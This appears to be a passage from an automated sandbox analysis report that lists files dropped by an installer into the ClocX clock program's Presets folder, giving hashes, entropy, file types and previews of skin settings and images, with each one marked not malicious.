MD5:	BA768117B0EE7DCC4D22D0CF34F17177
SHA1:	048DF18F592EB751DC8094BA82BC77A9EC7E1316
SHA-256:	2B6EED6932C65F8AC44E36D62C4BBED226DB938ACB6AB43134E756F5F85DE943
SHA-512:	9A22B6F9A1ED5807C0C9B7E6974E0717C54F255A7E26F03097D3AC92A9A4EE1FD8C02F7707302E3078BE29176554DE32D9514ED849963B8A1AECCC3126137F71
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x000000 ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font..AMPMCenterX=61..AMPMCenterY=88......DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12..DateCenterX=62..DateCenterY=45......HourColor=0xAA5F55 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xAA5F55 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=0 ;overlap o

C:\Program Files (x86)\ClocX\Presets\black and steel.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1573
Entropy (8bit):	4.92543323823258
Encrypted:	false
SSDEEP:	24:BE0rGXE5lr9BP5WaKDihTOh01kPkpFgdGm8RiTm7ib/v7Wd9iBI5auQI:BTqylRWfkbIdGm5msCTiBtvI
MD5:	885F743529845BDC1B4C9766FDA77D0A
SHA1:	478E113115B3958E77076D0F1E2F7CFBCEE00FCF
SHA-256:	56FB2FC2890BAFB2324D7168D211B1DDC91AF4C869EEB5613F15B2073757C83C
SHA-512:	553A98A1D2C039C053C048E391BC81E5E84509EFB7EB84E38B194C167BD2FCCFBE93263E92CBE505624433B4EBCB042B4A76749420448D2ED818C7500A2C7B12
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFF00FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=14 ;size of AM/PM font..AMPMCenterX=61..AMPMCenterY=122......DisableDate=1..DateColor=0xFFFFFF..DateFont=Arial..DateFontSize=16..DateCenterX=75..DateCenterY=100......HourColor=0xFFFFFF ;color of hour hand..HourLength=35 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=2 ;width of hour hand....MinuteColor=0xFFFFFF ;color of minute hand..MinuteLength=55 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x0000FF ;color of second hand..SecondLength=60 ;length of second hand..SecondLap=10 ;overlap

C:\Program Files (x86)\ClocX\Presets\black and steel.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 150 x 145, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	8101
Entropy (8bit):	7.944900564128968
Encrypted:	false
SSDEEP:	192:E6s2mM8JBwjL+2Cze54iq+LMpWZizMVHGzRmz8Lu7vDpri15n:ZSMswf+te3q+o8szRmz8gvE3
MD5:	747303365A184814658774165BD7C883
SHA1:	93BB4D77704884F2DA950F68ACA59F1E60AE9D98
SHA-256:	9876CBE95D2BCA6E45F20BE2C75B4425DC434FF5E56DF4F7DB1985F679BF4056
SHA-512:	2612754DA59CFA739BAF3E1AD61DBD052D00E16F4DA7FDD94679585BC82CEDFF64A6C5B77C28E0D0414093FA0F09D30D0B40185D8AC191262673AD93929527D5
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............h....tIME.....$:O.K.....pHYs.........B.4.....PLTE.............. .#( .. .!!".#"$&$('(&#)-($&(&*(('+)--,1/0.-160.300.21454978559;86;886::=)/@-3D15B06I59B5:J:5A<7H=<B<<I3>Q<@==AG<CR@??A>EEE=BAEEDJGHDFHLHELIIEKJMLKROPNMPURLLQMWVQMQQTTSZWXVVY\XT][YSZZ\AOdMUcTNaURaWThU\eQ\mZUc\Ui][b]Zi^[q_`]]afXduiYNa\Wb\ie^qcc\teXbbeecjgieejkhgghelklbjimkgtmpilprphhrk{qrjrrtusztxtuyzxwwxt}y{rzz\|\l.mj.es.um.{u.~z.}.v}..\|...nX.~~.y..\|......\|..............................................................................................................................................................................................................................................................................................................................................................................................U....{tRNS..................................................................................................................................IDATx..

C:\Program Files (x86)\ClocX\Presets\cowboy2.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1392
Entropy (8bit):	4.808211118758739
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9Bx6TOr01Ezkp8dGIo8bCiDadKibQ0Wd9iBxLuQI:BzqFlYBSdGJQlA9QJTiBxLvI
MD5:	7B78A925BCBF93FF614A1C4FE7E84673
SHA1:	6DBD5F227E72363B4301DE8C7923442466714CD3
SHA-256:	E791213655F1CB3E5B5A08B01411E48D9EBE480166742A77F120B2964BE2D7AD
SHA-512:	7B051908EE1D78229847008A5217607EB492E174A9C56CC46A5B93360AABEA43693F61F2BD9E993A39328E7D42CCA64C5B32E12F28CA7A9F9A4E61823A56470D
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....HourColor=000 ;color of hour hand..HourLength=40 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=6 ;width of hour hand....MinuteColor=000 ;color of minute hand..MinuteLength=62 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=20 ;overlap of second hand..SecondWidth=2 ;width of second hand....CenterX=100 ;center point's X (default image_width / 2)..CenterY=100

C:\Program Files (x86)\ClocX\Presets\cowboy2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 200 x 201, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	44974
Entropy (8bit):	7.993740849593251
Encrypted:	true
SSDEEP:	768:/tfJ+gfGQkB4WLWrl6K/OYI4U0SyJIWu2erDzyHJaYJFJICsYjqAwInHEVnVw:egf/04QWAK9IN0Lq2eqaYJFOCOAwIHgq
MD5:	C41A10919D89B2E79D9602B5644BADB3
SHA1:	F83673308724DB3238FF799D30F8478C86CDD577
SHA-256:	45C550427466A8588B8B9C7EDA3AA685C38CAD1E6DCB6DE43860B214B3C3FC76
SHA-512:	AC2150D30FD8FB3FD87F338896715F02E1B4D0D1DCBEAD3C4B4F22B8BEE438C1D271CDBF01374F7721D8EE675B8839A150FDD3DD4F777393A7E9D854FDF799EF
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............f.};...,tEXtCreation Time.Sat 22 Sep 2007 01:46:32 -08001..~....tIME.....5%\..L....pHYs...........~.....gAMA......a.....IDATx..\{.]E..u..}....B"..%Dp....$$!...A.Ek%.[......B....Z.....,..@,....PR.A.. "D.7.H..BB...=.t..u.>...L.C2..7u.G.>}.._..>..:BGhT....:.;m.....y...v.z._.P.d..})......[..._..%.../.q..z....~..2.....2\......(U..w..SJ..!...B.%.(5....+..OBh/.?.l.j..st.9..=.Z......x..\|.....p.#.y...t.._X.XJ.....B\...=1.....6.p{:;.u]...6:1@.w..-I.myp..;'...':.....,..9{.....K...%...}.....o....W.5...$..s..6....otF....[..w...ly..&..'3..H.ZS..Dx...j....;/..;:.C........H....L...^.......-.$...._.~.^h........~.\|...f........Y...F.....F...M....@..s..;...8EM......N...MC.vM.`L"z_.d%...T>&.X+.w&I.Y..V-.M3.e().a1E..(y..\..\..@..=.6.S.....e....A.....e.v.!....8uX..J.m...wS.<L.w..q..o^58.c5Q.>..z.../..k....aN`.)/.....=+..k....fRH0.z.~Iv...Y<..N.A.../...[..%........b..bL....=q..."X4A.~.=.I..i`&.i.."Uv.T..;..?.lPx.... .:.[..o.i.,~s..^6.{....!..fB[V..[cP3

C:\Program Files (x86)\ClocX\Presets\default.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 121 x 121 x 24, resolution 2795 x 2795 px/m, cbSize 44100, bits offset 54
Category:	dropped
Size (bytes):	44100
Entropy (8bit):	3.83871121046637
Encrypted:	false
SSDEEP:	384:bTjuQGkjL9f2ulV12XTVv2ENp8JAoa1137h7ANbUx2:njXqukjk/Jc376NX
MD5:	15EAA774AC3848A3B4DDA0E66F5E9287
SHA1:	A3DF74FD4EBE8A46D301E27E295082CC4EBA3C39
SHA-256:	C9243878C5B9B666681D16DF368EB1532A5605701A25AA6121F3D5CFC7189C8E
SHA-512:	B78CB65E51590388EBC748EB260E3836DF30377A1F7A8207C0DB05FD0A3E2B8F4B4FEBD25C5640B803497079E07E11F5E1A2C74B1771ADCBCEA9ED2A188E84B2
Malicious:	false
Reputation:	unknown
Preview:	BMD.......6...(...y...y................................l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l...l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..iD.cA.\;{S4pL.fF(`C$]B#[@!Z@![A![B#\C#[A"Z@!\@"`C$fF(oL.zS3.Y9.dB.iD.l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l...l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..fC.X1.M$kA.^8.t...;..E".M*.T(.^2.\(.Y%.k0.d).v1.p+.u..p).k#.g..d .^..S..L.y7.y7.t:

C:\Program Files (x86)\ClocX\Presets\default.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1540
Entropy (8bit):	4.911895982050817
Encrypted:	false
SSDEEP:	24:BEZrGXE5lr9BxjTJaKhVY/qTORXFB01rfwkpWdGm8bCi51PgibQ0Wd9iBxLuQI:BkqyllTJfgLFK3MdGmQ71PXQJTiBxLvI
MD5:	D90F48DF60ACDE7569BEDC4C4B5C7AC3
SHA1:	75229A0AD9D810D292B746D9B2FA04514C509D72
SHA-256:	E444253E619E3599AB17BD1927911B8F0362254EF469886EDB53A6FAE9C580CE
SHA-512:	644CA33C38A1D7F26276FF029423BC2BB68B8E21F06AF877562DED4BBCBD3A59E368CFB5BDC10E2ACAAC0C5B7E427DA306FD4B0A44C7E03ADFD276342E7AEFD0
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xAC6C1C ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font..AMPMCenterX=61..AMPMCenterY=88......DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12..DateCenterX=62..DateCenterY=45......HourColor=0xAA5F55 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xAA5F55 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=0 ;overlap o

C:\Program Files (x86)\ClocX\Presets\domeclock\domehour.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 40 x 14, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	2290
Entropy (8bit):	7.700327487136672
Encrypted:	false
SSDEEP:	48:LLDh2CM+hIEWlV2mEGE9cx7g+SNpWmefyAZZJDrS:LB2oe5lVEYx7hSNCf7Zfe
MD5:	2B3AB55EE12A47F5A20F8CFA2D46724B
SHA1:	1FB28F49EC9D8F2B7E90EEF82CFA48C5B7BD8687
SHA-256:	40A519F829558E1BD12C88F891125420079D40FF3C10B5940724F8D27D69D4B3
SHA-512:	777B53C0912C99A4EFE0B7D91BBB8D24CE4D74BAEC12DB92905976E4635BF23FC69126309D2BDA7579328170B963B0B8A6D66AE5F84C68BB8823F4AC9D79C878
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...(..........n.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o.......}IDATx.b8t......>........s.+...b.....0a..{...imm9..... ..:...........^!Q...[.1....I...u.....ny9I....4......7.........9;../.?........_.s..SSQ...3...)............``^.........vvu......................7.......?g...?.%e...f...'..HHJ3........g......Vx........Sg/2.y.~.}..\!@..ps.2X...).)....t........../?.Y....U.VVV\|.. .I9i.K7o0dee3...2...........hlh..../.._.1...0l.2<z..!........._...=e8{....L...e...N.\.bm.K}.'Oc........ ..W.....Q.......P...POK....,KNV.&&#...........,++,....!....232H...........f...t..!.............a...99.L...lll...+....L..6........N..1.1......h....=...[VVV.w.>\|.......Q............................................pqo]........................??A.................^..=w........edaae...?.##.....D223_..G\|...8v..=......@L..<K.=w..{..........iww.{..>.z...?//.W.t!*%).63;.....?w...j@K1....Q...................r...rNLH....{................\|}~........(...........i...

C:\Program Files (x86)\ClocX\Presets\domeclock\domemin.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 60 x 9, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	2317
Entropy (8bit):	7.655538415930818
Encrypted:	false
SSDEEP:	48:3Od6w3EFNTi5xexqAPIzGS/S1eRl65PlgmpXnoBjuuSTq:3OdrUr+DqcieqempXnOvSTq
MD5:	71E6CF4FCE7A3C0088267F1A71ED8630
SHA1:	94B3755BF1077F8C52FFA7450DF6094F1C72E939
SHA-256:	EB308EFA319EA51E367092AAE0BD118081C0340B6ACAD03C1D55E431E33469D9
SHA-512:	C0D7A288D8425B3D4B22E9F48FD47F22095A631C41F6F67E0F364FDD41AC3029325B9133987C8CFD59B7816FAE02D4ADD0A6E16E923B422BAF175A062D025912
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...<..........L......gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b.s..#.3....3.z..AT\.AOO.!00....3....!............,-+.........1/.................?@E...............qqq.......YQQ.....BA!...B..V.6..b.........=....+.6}....@DM....:....48<.....BDK.....>?D.KLQ.STY.:;=.vwy......1/......eii.....""........e...y.......:.9.......FFF....c..Tg...=....;>F.hfb{....11/.........kmm....%".c....+.....11............=...._^b}........jjk....j....................888...................y...........................-...............................W\|~}....b`^.........???'zzz.....1221...N........}}}.,,,...........y....................... ...............{...'................tsy.EEC..&.......=....................HHD................................?}.d..z....?\|`.6}._[;'....0...MIYAm..7......)].n..Z.:..oa`bffPVRbpttfpssc......W..+V2<z.....[ggg.WWW.........@...ED...V.........sf.v.\|..:......o...YUFZ..............=y....{.....7.0..8.\.pA.......9.Y..&.w...........

C:\Program Files (x86)\ClocX\Presets\dragon.bk

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1477
Entropy (8bit):	4.874701427171613
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9BxoaKy4XTORXFB01rfLkpWdGm8di9MiXGibQ0Wd9iBxLuQI:BzqFluf18FKeMdGmfMiXpQJTiBxLvI
MD5:	187F4E9C78AC647EF5C632C9910211F3
SHA1:	C0BC244E495B267B294237EBB158689CFE7787A8
SHA-256:	C4E752988EA9D30089DB49CDA515FE5B4F460DB402879CBA941D27F271FDE0CB
SHA-512:	01E221AEBAD7AEA7067B4D2BFBB06D829FEB158DE0DCE336BA641DB578F8248A8FDDE2C49FB75D3E79440643091FD39A7185E1F041136BC203ACDBE3E06BCE1C
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12....HourColor=0x666666 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x444444 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x000000 ;color of second hand..SecondLength=50 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=.4 ;width of second hand....

C:\Program Files (x86)\ClocX\Presets\dsaqua.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 129 x 129 x 16, resolution 2834 x 2834 px/m, cbSize 33596, bits offset 54
Category:	dropped
Size (bytes):	33596
Entropy (8bit):	5.943688620603497
Encrypted:	false
SSDEEP:	384:WF3WK3fGUUUUUUUUUUUUUUUUDUUUUU63EZJTL/o70pn0cCzW7dmb90:k3WK30UZpL/o70UzWkK
MD5:	4D99C681A6F8DF6BD48A49B3162B0DBB
SHA1:	123E39E10426BFEC2A050B963ECEC4FC379EAD97
SHA-256:	48DB744D53E5D7EB33715CF57215B6D556BFF12A0A21158B37215EF67CE96787
SHA-512:	FD5A0F937401FBC850FD67AAEC9274244A796AC81FD1E25A7BE753F7382FFA32D1E7B72A7EBF6EBC87C75BECBA1001195BE93C6361CFE58D35910D9393154AE8
Malicious:	false
Reputation:	unknown
Preview:	BM<.......6...(........................................\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|...................................\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|...\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.......................................................\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|...\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|...................%k-.91F.R.Z.gZkZkZk9g.^.VRJ.=.1)%...................\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|...\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|..............J).9.RZk.s.w.{.{.......................{.{.{.s{o.Z.Bk-. ........

C:\Program Files (x86)\ClocX\Presets\earth.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1406
Entropy (8bit):	4.79578084741415
Encrypted:	false
SSDEEP:	24:BEQrGXz5lrUBRSTOLX01rfPkp+dGm8JiX33NPeibQ0Wd9iBxLuQI:BzqFlQGiEdGmxtPBQJTiBxLvI
MD5:	D4C8BC1C07C0077783E15664BADF33E3
SHA1:	EF27B3AE33D84581098C96384784282E090AFAC1
SHA-256:	051468A847913306CF9FB5DCBF17BDDAB5AC36689DCBA6DA0374DBBB5383B6C0
SHA-512:	5F7C44CE2FBB1E4FA332436CAFDE4085A91CC55DFDC404143A586B3777AA168783F6D82396C57C443102CE9606E044845E5680209FF8234D78CCEC9E5FF4632A
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0xFFFFFF.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font....HourColor=0xfffFFF ;color of hour hand..HourLength=39 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xFFFFFF ;color of minute hand..MinuteLength=59 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0xFFFFFF ;color of second hand..SecondLength=63 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand.... ;CenterX=60 ;center point's X (default image_width / 2).. ;

C:\Program Files (x86)\ClocX\Presets\earth.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 186 x 186, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	57316
Entropy (8bit):	7.983908983566808
Encrypted:	false
SSDEEP:	1536:iJ+ytG7+qh+bLgR52aFR/mizDX/xwE4pr9:C+ytG7J2LY52C7X5wn9
MD5:	4AAFF353A088E9B576D7439092B1DCF5
SHA1:	CA044A1E5967D3CD2F9BB9F836B9866CD4CEC0EF
SHA-256:	08ECBB835A9061D88A2B4E8955194F7A924A951D68C9C94F587A3E2AD6E6D707
SHA-512:	5397BF8F38B2A6C3990B8545E49B37B6EB29B14115E51CBAB9C6221E0BB5E55FBA41A031D19A214165201908C6B0683CB4308B73C60BD3D3832A33B2AD8B4D2E
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............W.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F...ZIDATx...w...U....z..r...'g%..B.$@.L...0.........\l.56...BY(....c..9...U{...Mk..].%.:.l...xG...U.U{.....g>K.cxs..../.....f....\o......f....\o......f....\o......f....\..e.#.....?.. .R.lb.qQF`..a<tl..C.Q.K..@$=....0h..AH....R`....#%.4..G..KJ.0h...8...c..,..(..U.Zb...1....B..XBb....Z. ,[.].P~&.A.H...@$..)@#d..hm4..Z..1..E...v...X..t.qh!.Z.D.H+.P.".A........h)1.XZ 0..J(.4.c....1Fb4Ha.....)1.....B..1.-......%... .Dh.f.u........R#......}s....e.h0d.aT.....).l..s@.gT....e'.L"a.I.v..8BJiY...........c.tL.E..wT..Sa...[)d..BB.W..W......`\|...zs.....q.1....wG...G<..o...O......b..atd.B6.P.......E....$.I<...T-#....ILd0Zc..r.$......J.R..eeu..j.J.........^5:x.c.b.e.....f..%..A.1..}....-.......a.}.........LM..L%.l..c359.....N.'.....s....c.....0.##$].N.K.Q..L.E...hVW.I$..H$QH...z.Wn,e....K...^...:.FZ..D..,.d..4......[.\o....6.1z....0v.g;....#{wn.}.9...[.

C:\Program Files (x86)\ClocX\Presets\earth2.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1471
Entropy (8bit):	4.872104151320744
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9BxoaKy4dTOK01rfhkpGdGm8bCi1833NPeibQ0Wd9iBxLuQI:BzqFluf1EY4dGmQD8tPBQJTiBxLvI
MD5:	F38314A74205C38938A37A67492D55F9
SHA1:	A66F27AF7D0C055BA04F2D8DE77FAA9C798D5E52
SHA-256:	EF1AFF8D42C199FAD7E1569DC34ED48F9A68B6CB15675040B6154C69164E7EAA
SHA-512:	ACADACF57D9597EEB8A83A349C6E565D1A1881EF7EBD5F0822495367A92F87AE62CC1FA07364DD756D2ECE2328DA3C3E0FE254C1B402FE3C6E83AB02DEEFF0CC
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12....HourColor=0x33CCCC ;color of hour hand..HourLength=27 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x33CCCC ;color of minute hand..MinuteLength=42 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=44 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand.... ;Cente

C:\Program Files (x86)\ClocX\Presets\greenmarble\marblehour.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 114 x 19, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	3839
Entropy (8bit):	7.883046313078185
Encrypted:	false
SSDEEP:	96:WBxILSDd4G24IscGnu+Pk3Tt6Z3Xw0A9dqXWO:WzkSDd6GnuHTEZ3g0soD
MD5:	BD2ECAFE288B72EE504AC1A40130F02A
SHA1:	58586107F3A6CD4885C0A7801921122370E60372
SHA-256:	08F9B95562E2D5179E821797CB9158234436ECED344C6257EA60FA1DDDFA4654
SHA-512:	28A2FE295E11C03D891C94768308A2122396B587CE847D2180C07CE8729304AB0EBF257FEED7078402B1F93FF06C55DC5D2FE665046B03278E62EF2657529CAB
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...r.........;ri.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b...?.)XY]..D...3...=....%1$.5?A.........A&.............................l.............l... .....@..E.o.1..~...Z.....c....9.................9..y.x.\|y.F.."p..T.......S..t.t.U....[...'N\..'-.-._?~pprs.]>y..!o......>'.?._.Y~.\<q.'HP.B.....NQA.Q...a...^6.&;.}.h........?......O........:...k....I...>.......=u.+.n.F.. .(.Qr.@.......T..e...t..p.3.6f...7....WN^.M.B..b.../,&..............}..Y....M..a.s&.Wo.....c.........y...p.s1.............\|c`dfa.be........]xy..M. .. ....+.\|x....._@.z&.....1...\|\|.&.....o.......?L.N\>`lk....g....IJ...xr......WO.:....pC3.V .....DRY..k.+ad.l. ..J4.......o.<..s.f..:.=u._...XY.....I.....Q.\...+?5...o...6................G....0....ELH.@OC~?+?.'..7...../.\|.............6....%.........'O;o_...$.i.W...........</.A...........3R..J.........w.^.\|..Y.7o..\|.......7..&.....f.QP..$.t.I...Q/...D.......I...qU.%F....7z...}....!).~.....s.6.`....

C:\Program Files (x86)\ClocX\Presets\greenmarble\marblemin.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 117 x 14, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	4804
Entropy (8bit):	7.872761167878164
Encrypted:	false
SSDEEP:	96:ytePcbs8T/pKuzqSpOOTD6IZ8mE10A1bHb3GDfxkwfK:x6TT3uAxfZ8n7bHb32U
MD5:	E4F18584A1443E393889D6B0725E69B6
SHA1:	943A2815F066D5C44777EEF80D0978FFA84A696F
SHA-256:	35C6E7D3B9BF347B696EEE60A2196F10355C07F132D4AC9BE48191BD876335EF
SHA-512:	36E26F70C4699AF2F71502FCB36B564A9A2B69021FAA5A8973AFBEFE0B3305F9A9D2574D88DDD775E336433F972CAF58536ADD934BE7395A9EA0A7C41FDF2208
Malicious:	false
Reputation:	unknown
